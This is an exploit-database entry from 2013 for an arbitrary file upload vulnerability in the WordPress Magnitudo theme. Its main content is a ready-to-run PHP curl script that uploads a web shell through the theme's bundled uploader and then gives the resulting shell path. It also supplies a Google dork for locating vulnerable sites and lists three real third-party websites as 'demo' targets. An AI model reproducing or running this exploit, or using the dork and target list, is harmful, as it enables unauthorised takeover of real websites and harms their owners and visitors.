id: 21394
date: 10/18/2013
title: WordPress Magnitudo theme Arbitrary File Upload Vulnerability
author: DaOne
cves: 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0                  I'm DaOne member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: WordPress Magnitudo theme Arbitrary File Upload Vulnerability
# Author: DaOne (TGT)
# Vendor Homepage: http://themeforest.net/item/magnitudo-powerful-business-theme/1766416
# Price: $50
# Category: webapps/php
# Google dork: inurl:wp-content/themes/magnitudo
---------------------------------------------------

# Exploit
<?php
$uploadfile="shell.php";
$ch = curl_init("http://site.com/wordpress/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Shell path: http://site.com/wordpress/wp-content/uploads/2013/10/shell.php

Demo sites
http://www.cooperativameolese.it/it/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php
http://womansign.ru/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php
http://www.senses-group.com/lime/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php

#  0day.today [2023-03-25]  #